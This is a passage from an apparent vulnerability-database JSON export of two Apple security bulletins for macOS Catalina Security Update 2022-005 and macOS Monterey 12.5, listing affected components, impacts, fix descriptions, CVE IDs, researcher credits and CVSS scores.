or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Security Update 2022-005 Catalina\n\nReleased July 20, 2022\n\n**APFS**\n\nAvailable for: macOS Catalina\n\nImpact: An app with root privileges may be able to execute arbitrary code with kernel privileges\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32832: Tommy Muir (@Muirey03)\n\n**AppleMobileFileIntegrity**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to gain root privileges\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32797: Mickey Jin (@patch1t), Ye Zhang (@co0py_Cat) of Baidu Security, Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory\n\nDescription: An out-of-bounds read issue was addressed with improved input validation.\n\nCVE-2022-32853: Ye Zhang(@co0py_Cat) of Baidu Security\n\nCVE-2022-32851: Ye Zhang (@co0py_Cat) of Baidu Security\n\n**AppleScript**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2022-32831: Ye Zhang (@co0py_Cat) of Baidu Security\n\n**Archive Utility**\n\nAvailable for: macOS Catalina\n\nImpact: An archive may be able to bypass Gatekeeper\n\nDescription: A logic issue was addressed with improved checks.\n\nCVE-2022-32910: Ferdous Saljooki (@malwarezoo) of Jamf Software\n\nEntry added October 4, 2022\n\n**Audio**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2022-32820: an anonymous researcher\n\n**Calendar**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to access sensitive user information\n\nDescription: The issue was addressed with improved handling of caches.\n\nCVE-2022-32805: Csaba Fitzl (@theevilbit) of Offensive Security\n\n**Calendar**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to access user-sensitive data\n\nDescription: An information disclosure issue was addressed by removing the vulnerable code.\n\nCVE-2022-32849: Joshua Jones\n\n**CoreText**\n\nAvailable for: macOS Catalina\n\nImpact: A remote user may cause an unexpected app termination or arbitrary code execution\n\nDescription: The issue was addressed with improved bounds checks.\n\nCVE-2022-32839: STAR Labs (@starlabs_sg)\n\n**FaceTime**\n\nAvailable for: macOS Catalina\n\nImpact: An app with root privileges may be able to access private information\n\nDescription: This issue was addressed by enabling hardened runtime.\n\nCVE-2022-32781: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**File System Events**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to gain root privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-32819: Joshua Mason of Mandiant\n\n**ICU**\n\nAvailable for: macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.\n\n**ImageIO**\n\nAvailable for: macOS Catalina\n\nImpact: Processing an image may lead to a denial-of-service\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2022-32785: Yi\u011fit Can YILMAZ (@yilmazcanyigit)\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32812: Yinyi Wu (@3ndy1), ABC Research s.r.o.\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption vulnerability was addressed with improved locking.\n\nCVE-2022-32811: ABC Research s.r.o\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: An app with root privileges may be able to execute arbitrary code with kernel privileges\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32815: Xinru Chi of Pangu Lab\n\nCVE-2022-32813: Xinru Chi of Pangu Lab\n\n**libxml2**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to leak sensitive user information\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2022-32823\n\n**PackageKit**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to modify protected parts of the file system\n\nDescription: An issue in the handling of environment variables was addressed with improved validation.\n\nCVE-2022-32786: Mickey Jin (@patch1t)\n\n**PackageKit**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to modify protected parts of the file system\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32800: Mickey Jin (@patch1t)\n\n**PluginKit**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to read arbitrary files\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro\n\n**PS Normalizer**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted Postscript file may result in unexpected app termination or disclosure of process memory\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-32843: Kai Lu of Zscaler's ThreatLabz\n\n**SMB**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to gain elevated privileges\n\nDescription: An out-of-bounds read issue was addressed with improved input validation.\n\nCVE-2022-32842: Sreejith Krishnan R (@skr0x1c0)\n\n**SMB**\n\nAvailable for: macOS Catalina\n\nImpact: A user in a privileged network position may be able to leak sensitive information\n\nDescription: An out-of-bounds read issue was addressed with improved bounds checking.\n\nCVE-2022-32799: Sreejith Krishnan R (@skr0x1c0)\n\n**Software Update**\n\nAvailable for: macOS Catalina\n\nImpact: A user in a privileged network position can track a user\u2019s activity\n\nDescription: This issue was addressed by using HTTPS when sending information over the network.\n\nCVE-2022-32857: Jeffrey Paul (sneak.berlin)\n\n**Spindump**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to overwrite arbitrary files\n\nDescription: This issue was addressed with improved file handling.\n\nCVE-2022-32807: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab\n\n**Spotlight**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to gain elevated privileges\n\nDescription: A validation issue in the handling of symlinks was addressed with improved validation of symlinks.\n\nCVE-2022-26704: Joshua Mason of Mandiant\n\n**TCC**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to access sensitive user information\n\nDescription: An access issue was addressed with improvements to the sandbox.\n\nCVE-2022-32834: Xuxiang Yang (@another1024) of Tencent Security Xuanwu Lab (xlab.tencent.com), Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com), Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nEntry updated September 16, 2022\n\n**Vim**\n\nAvailable for: macOS Catalina\n\nImpact: Multiple issues in Vim\n\nDescription: Multiple issues were addressed by updating Vim.\n\nCVE-2021-4136\n\nCVE-2021-4166\n\nCVE-2021-4173\n\nCVE-2021-4187\n\nCVE-2021-4192\n\nCVE-2021-4193\n\nCVE-2021-46059\n\nCVE-2022-0128\n\n**Wi-Fi**\n\nAvailable for: macOS Catalina\n\nImpact: An app may be able to cause unexpected system termination or write kernel memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32837: Wang Yu of Cyberserval\n\nEntry added September 16, 2022\n\n**Wi-Fi**\n\nAvailable for: macOS Catalina\n\nImpact: A remote user may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32847: Wang Yu of Cyberserval\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 04, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T00:00:00", "type": "apple", "title": "About the security content of Security Update 2022-005 Catalina", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4136", "CVE-2021-4166", "CVE-2021-4173", "CVE-2021-4187", "CVE-2021-4192", "CVE-2021-4193", "CVE-2021-46059", "CVE-2022-0128", "CVE-2022-26704", "CVE-2022-32781", "CVE-2022-32785", "CVE-2022-32786", "CVE-2022-32787", "CVE-2022-32797", "CVE-2022-32799", "CVE-2022-32800", "CVE-2022-32805", "CVE-2022-32807", "CVE-2022-32811", "CVE-2022-32812", "CVE-2022-32813", "CVE-2022-32815", "CVE-2022-32819", "CVE-2022-32820", "CVE-2022-32823", "CVE-2022-32826", "CVE-2022-32831", "CVE-2022-32832", "CVE-2022-32834", "CVE-2022-32837", "CVE-2022-32838", "CVE-2022-32839", "CVE-2022-32842", "CVE-2022-32843", "CVE-2022-32847", "CVE-2022-32849", "CVE-2022-32851", "CVE-2022-32853", "CVE-2022-32857", "CVE-2022-32910"], "modified": "2022-07-20T00:00:00", "id": "APPLE:315A0A489FE54A17BA14F0B62D49D716", "href": "https://support.apple.com/kb/HT213343", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-18T14:56:45", "description": "# About the security content of macOS Monterey 12.5\n\nThis document describes the security content of macOS Monterey 12.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## macOS Monterey 12.5\n\nReleased July 20, 2022\n\n**APFS**\n\nAvailable for: macOS Monterey\n\nImpact: An app with root privileges may be able to execute arbitrary code with kernel privileges\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32832: Tommy Muir (@Muirey03)\n\n**AppleAVD**\n\nAvailable for: macOS Monterey\n\nImpact: A remote user may be able to cause kernel code execution\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2022-32788: Natalie Silvanovich of Google Project Zero\n\nEntry added September 16, 2022\n\n**AppleMobileFileIntegrity**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to access user-sensitive data\n\nDescription: This issue was addressed by enabling hardened runtime.\n\nCVE-2022-32880: Wojciech Regu\u0142a (@_r3ggi) of SecuRing, Mickey Jin (@patch1t) of Trend Micro, Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry added September 16, 2022\n\n**AppleMobileFileIntegrity**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to gain root privileges\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro\n\n**Apple Neural Engine**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed with improved input validation.\n\nCVE-2022-42805: Mohamed Ghannam (@_simo36)\n\nEntry added November 9, 2022\n\n**Apple Neural Engine**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2022-32948: Mohamed Ghannam (@_simo36)\n\nEntry added November 9, 2022\n\n**Apple Neural Engine**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32810: Mohamed Ghannam (@_simo36)\n\n**Apple Neural Engine**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32840: Mohamed Ghannam (@_simo36)\n\n**Apple Neural Engine**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2022-32845: Mohamed Ghannam (@_simo36)\n\nEntry updated November 9, 2022\n\n**AppleScript**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32797: Mickey Jin (@patch1t), Ye Zhang (@co0py_Cat) of Baidu Security, Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory\n\nDescription: An out-of-bounds read issue was addressed with improved input validation.\n\nCVE-2022-32851: Ye Zhang (@co0py_Cat) of Baidu Security\n\nCVE-2022-32852: Ye Zhang (@co0py_Cat) of Baidu Security\n\nCVE-2022-32853: Ye Zhang (@co0py_Cat) of Baidu Security\n\n**AppleScript**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory\n\nDescription: An out-of-bounds read issue was addressed with improved bounds checking.\n\nCVE-2022-32831: Ye Zhang (@co0py_Cat) of Baidu Security\n\n**Archive Utility**\n\nAvailable for: macOS Monterey\n\nImpact: An archive may be able to bypass Gatekeeper\n\nDescription: A logic issue was addressed with improved checks.\n\nCVE-2022-32910: Ferdous Saljooki (@malwarezoo) of Jamf Software\n\nEntry added October 4, 2022\n\n**Audio**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2022-32820: an anonymous researcher\n\n**Audio**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to disclose kernel memory\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32825: John Aakerblom (@jaakerblom)\n\n**Automation**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to bypass Privacy preferences\n\nDescription: A logic issue was addressed with improved checks.\n\nCVE-2022-32789: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab\n\n**Calendar**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to access sensitive user information\n\nDescription: The issue was addressed with improved handling of caches.\n\nCVE-2022-32805: Csaba Fitzl (@theevilbit) of Offensive Security\n\n**CoreMedia**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to disclose kernel memory\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32828: Antonio Zekic (@antoniozekic) and John Aakerblom (@jaakerblom)\n\n**CoreText**\n\nAvailable for: macOS Monterey\n\nImpact: A remote user may cause an unexpected app termination or arbitrary code execution\n\nDescription: The issue was addressed with improved bounds checks.\n\nCVE-2022-32839: STAR Labs (@starlabs_sg)\n\n**File System Events**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to gain root privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-32819: Joshua Mason of Mandiant\n\n**GPU Drivers**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to disclose kernel memory\n\nDescription: Multiple out-of-bounds write issues were addressed with improved bounds checking.\n\nCVE-2022-32793: an anonymous researcher\n\n**GPU Drivers**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-32821: John Aakerblom (@jaakerblom)\n\n**iCloud Photo Library**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to access sensitive user information\n\nDescription: An information disclosure issue was addressed by removing the vulnerable code.\n\nCVE-2022-32849: Joshua Jones\n\n**ICU**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.\n\n**ImageIO**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted file may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved checks.\n\nCVE-2022-32802: Ivan Fratric of Google Project Zero, Mickey Jin (@patch1t)\n\nEntry added September 16, 2022\n\n**ImageIO**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted image may result in disclosure of process memory\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32841: hjy79425575\n\n**ImageIO**\n\nAvailable for: macOS Monterey\n\nImpact: Processing an image may lead to a denial-of-service\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2022-32785: Yi\u011fit Can YILMAZ (@yilmazcanyigit)\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption vulnerability was addressed with improved locking.\n\nCVE-2022-32811: ABC Research s.r.o\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32812: Yinyi Wu (@3ndy1), ABC Research s.r.o.\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An app with root privileges may be able to execute arbitrary code with kernel privileges\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32813: Xinru Chi of Pangu Lab\n\nCVE-2022-32815: Xinru Chi of Pangu Lab\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to disclose kernel memory\n\nDescription: An out-of-bounds read issue was addressed with improved bounds checking.\n\nCVE-2022-32817: Xinru Chi of Pangu Lab\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32829: Tingting Yin of Tsinghua University, and Min Zheng of Ant Group\n\nEntry updated September 16, 2022\n\n**Liblouis**\n\nAvailable for: macOS Monterey\n\nImpact: An app may cause unexpected app termination or arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-26981: Hexhive (hexhive.epfl.ch), NCNIPC of China (nipc.org.cn)\n\n**libxml2**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to leak sensitive user information\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2022-32823\n\n**Multi-Touch**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved checks.\n\nCVE-2022-32814: Pan ZhenPeng (@Peterpan0927)\n\n**Multi-Touch**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2022-32814: Pan ZhenPeng (@Peterpan0927)\n\n**PackageKit**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to modify protected parts of the file system\n\nDescription: An issue in the handling of environment variables was addressed with improved validation.\n\nCVE-2022-32786: Mickey Jin (@patch1t)\n\n**PackageKit**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to modify protected parts of the file system\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32800: Mickey Jin (@patch1t)\n\n**PluginKit**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to read arbitrary files\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro\n\n**PS Normalizer**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted Postscript file may result in unexpected app termination or disclosure of process memory\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-32843: Kai Lu of Zscaler's ThreatLabz\n\n**SMB**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2022-32796: Sreejith Krishnan R (@skr0x1c0)\n\n**SMB**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to gain elevated privileges\n\nDescription: An out-of-bounds read issue was addressed with improved input validation.\n\nCVE-2022-32842: Sreejith Krishnan R (@skr0x1c0)\n\n**SMB**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to gain elevated privileges\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2022-32798: Sreejith Krishnan R (@skr0x1c0)\n\n**SMB**\n\nAvailable for: macOS Monterey\n\nImpact: A user in a privileged network position may be able to leak sensitive information\n\nDescription: An out-of-bounds read issue was addressed with improved bounds checking.\n\nCVE-2022-32799: Sreejith Krishnan R (@skr0x1c0)\n\n**SMB**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to leak sensitive kernel state\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32818: Sreejith Krishnan R (@skr0x1c0)\n\n**Software Update**\n\nAvailable for: macOS Monterey\n\nImpact: A user in a privileged network position can track a user\u2019s activity\n\nDescription: This issue was addressed by using HTTPS when sending information over the network.\n\nCVE-2022-32857: Jeffrey Paul (sneak.berlin)\n\n**Spindump**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to overwrite arbitrary files\n\nDescription: This issue was addressed with improved file handling.\n\nCVE-2022-32807: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab\n\n**Spotlight**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to gain root privileges\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32801: Joshua Mason (@josh@jhu.edu)\n\n**subversion**\n\nAvailable for: macOS Monterey\n\nImpact: Multiple issues in subversion\n\nDescription: Multiple issues were addressed by updating subversion.\n\nCVE-2021-28544: Evgeny Kotkov, visualsvn.com\n\nCVE-2022-24070: Evgeny Kotkov, visualsvn.com\n\nCVE-2022-29046: Evgeny Kotkov, visualsvn.com\n\nCVE-2022-29048: Evgeny Kotkov, visualsvn.com\n\n**TCC**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to access sensitive user information\n\nDescription: An access issue was addressed with improvements to the sandbox.\n\nCVE-2022-32834: Xuxiang Yang (@another1024) of Tencent Security Xuanwu Lab (xlab.tencent.com), Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com), Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nEntry updated September 16, 2022\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: A user may be tracked through their IP address\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-32861: Matthias Keller (m-keller.com)\n\nEntry added September 16, 2022\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2022-32863: P1umer, afang5472, xmzyshypnc\n\nEntry added September 16, 2022\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Visiting a website that frames malicious content may lead to UI spoofing\n\nDescription: The issue was addressed with improved UI handling.\n\nWebKit Bugzilla: 239316 \nCVE-2022-32816: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nWebKit Bugzilla: 240720 \nCVE-2022-32792: Manfred Paul (@_manfp) working with Trend Micro Zero Day Initiative\n\n**WebRTC**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nWebKit Bugzilla: 242339 \nCVE-2022-2294: Jan Vojtesek of Avast Threat Intelligence team\n\n**Wi-Fi**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2022-32860: Wang Yu of Cyberserval\n\nEntry added November 9, 2022\n\n**Wi-Fi**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to cause unexpected system termination or write kernel memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32837: Wang Yu of Cyberserval\n\n**Wi-Fi**\n\nAvailable for: macOS Monterey\n\nImpact: A remote user may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32847: Wang Yu of Cyberserval\n\n**Windows Server**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to capture a user\u2019s screen\n\nDescription: A logic issue was addressed with improved checks.\n\nCVE-2022-32848: Jeremy Legendre of MacEnhance\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**802.1X**\n\nWe would like to acknowledge Shin Sun of National Taiwan University for their assistance.\n\n**AppleMobileFileIntegrity**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Regu\u0142a (@_r3ggi) of SecuRing for their assistance.\n\n**Calendar**\n\n****We would like to acknowledge Joshua Jones for their assistance.\n\n**configd**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Regu\u0142a (@_r3ggi) of SecuRing for their assistance.\n\n**DiskArbitration**\n\nWe would like to acknowledge Mike Cush for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 09, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-20T00:00:00", "type": "apple", "title": "About the security content of macOS Monterey 12.5", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28544", "CVE-2022-2294", "CVE-2022-24070", "CVE-2022-26981", "CVE-2022-29046", "CVE-2022-29048", "CVE-2022-32785", "CVE-2022-32786", "CVE-2022-32787", "CVE-2022-32788", "CVE-2022-32789", "CVE-2022-32792", "CVE-2022-32793", "CVE-2022-32796", "CVE-2022-32797", "CVE-2022-32798", "CVE-2022-32799", "CVE-2022-32800", "CVE-2022-32801", "CVE-2022-32802", "CVE-2022-32805", "CVE-2022-32807", "CVE-2022-32810", "CVE-2022-32811", "CVE-2022-32812", "CVE-2022-32813", "CVE-2022-32814", "CVE-2022-32815", "CVE-2022-32816", "CVE-2022-32817", "CVE-2022-32818", "CVE-2022-32819", "CVE-2022-32820", "CVE-2022-32821", "CVE-2022-32823", "CVE-2022-32825", "CVE-2022-32826", "CVE-2022-32828", "CVE-2022-32829", "CVE-2022-32831", "CVE-2022-32832", "CVE-2022-32834", "CVE-2022-32837", "CVE-2022-32838", "CVE-2022-32839", "CVE-2022-32840", "CVE-2022-32841", "CVE-2022-32842", "CVE-2022-32843", "CVE-2022-32845", "CVE-2022-32847", "CVE-2022-32848", 